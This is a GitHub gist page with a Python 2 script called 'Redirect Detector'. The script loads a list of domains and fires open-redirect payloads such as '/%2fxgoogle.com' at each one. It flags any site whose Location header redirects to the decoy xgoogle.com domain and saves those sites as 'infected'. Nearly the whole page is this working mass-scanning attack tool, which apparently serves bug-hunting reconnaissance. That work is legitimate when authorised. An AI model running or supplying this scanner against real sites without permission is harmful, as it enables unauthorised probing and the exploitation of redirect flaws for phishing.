Skip to content

Instantly share code, notes, and snippets.

@YasserGersy
Created July 25, 2017 21:29
Show Gist options
  • Save YasserGersy/035474809b08ba92eb06b6023ca4e720 to your computer and use it in GitHub Desktop.
Save YasserGersy/035474809b08ba92eb06b6023ca4e720 to your computer and use it in GitHub Desktop.
Server_redirect.py
import requests,time,sys,os
requests.adapters.DEFAULT_RETRIES = 2
from requests.packages.urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter
s = requests.Session()
retries = Retry(total=5,
backoff_factor=0.1,
status_forcelist=[ 500, 502, 503, 504 ])
s.mount('http://', HTTPAdapter(max_retries=retries))
hide_unuseful_data=False
proxyDict = { "http" : "http://127.0.0.1:8080", "https" : "https://127.0.0.1:8080", "ftp" : "ftp://127.0.0.1:8080"}
print '''
----------------------
Redirect Detector
----------------------
'''
def spaces(strx,lenx):
while len(strx)<lenx:
strx=strx+' '
return strx
path=''
infected=[]
if len(sys.argv)>1:
path=sys.argv[1]
if os.path.isfile(path) is False:
print path+' not found'
try:
infected=open('crlf_infected.txt','r').readlines()
except Exception:
infected=[]
lines=[]
payloads={'/xgoogle.com/%2F..','/xgoogle.com/%2f%2e%2e','/%2fxgoogle.com'}
matches = {'https://xgoogle.com','http://xgoogle.com','//xgoogle.com'}
try:
lines=open(path,'r').readlines()
except Exception,e:
print str(e)
domain_counter=0
request_counter=1
print ('\n Loaded domains : '+str(len(lines))+'\n--------------------\n')
for l in lines:
domain_counter=domain_counter+1
if l in infected:
continue
l=l.strip()
if len(l)<3 or ('.' not in l ):
continue
if l.startswith('https://'):
l=l[8:]
unreachable=False
for pay in payloads:
if unreachable:
break
try:
headers={'Host': l,'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0','x-gersy':l+' '+str(domain_counter),'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Language': 'en-US,en;q=0.5'}
if (l.startswith('http://') is False) :
url='http://'+l
url=url+'/'+pay
print (spaces('\n[+] ['+str(request_counter)+'] ['+str(domain_counter)+'] ['+l+']',50) if hide_unuseful_data is False else ''),
r=s.get(url=url,headers=headers,allow_redirects=False,verify=False,timeout=5)#,proxies=proxyDict)
request_counter=request_counter+1
bod=r.text.encode('utf-8')
code=str(r.status_code)
code=(code if len(code) > 2 else 'No reponse')
try:
location=r.headers['Location']
except Exception:
location=''
if hide_unuseful_data is False:
print code,
else :
print request_counter,
if len(location) > 1 :
print ('\n To '+location+'\n' if hide_unuseful_data is False else ''),
for m in matches:
if location.startswith(m):
infected.append(l)
print l+'\n Infected using '+url+'\n To :' +location
break
except Exception,e:
e=str(e)
if ( hide_unuseful_data is False):
if 'HTTPConnectionPool(' in e :
# print spaces('[+] '+l ,30)+' : [Can not connect] ',
print (' : [Can not connect] ' if hide_unuseful_data is False else ''),
unreachable=True
break
else:
print ('[-]' + e if hide_unuseful_data is False else '')
if len(infected)>0:
try:
open('OR_infected.txt','w').writelines(infected)
except Exception:
print 'Saving error'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment